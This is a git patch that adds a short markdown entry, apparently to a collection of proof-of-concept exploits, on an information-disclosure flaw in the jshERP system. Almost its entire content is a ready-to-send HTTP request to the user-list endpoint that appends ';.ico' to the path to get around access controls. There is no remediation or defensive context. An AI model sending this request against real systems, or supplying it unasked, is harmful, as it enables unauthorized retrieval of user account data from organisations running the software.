From 1beb0a3afcb2c69792d267f601e209d871ec14e5 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 7 Nov 2023 13:04:25 +0800
Subject: [PATCH] =?UTF-8?q?Create=20jshERP=E4=BF=A1=E6=81=AF=E6=B3=84?=
 =?UTF-8?q?=E9=9C=B2=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 jshERP信息泄露漏洞.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 jshERP信息泄露漏洞.md

diff --git a/jshERP信息泄露漏洞.md b/jshERP信息泄露漏洞.md
new file mode 100644
index 0000000..107ed80
--- /dev/null
+++ b/jshERP信息泄露漏洞.md
@@ -0,0 +1,12 @@
+## jshERP 信息泄露漏洞
+
+## POC
+```
+GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+```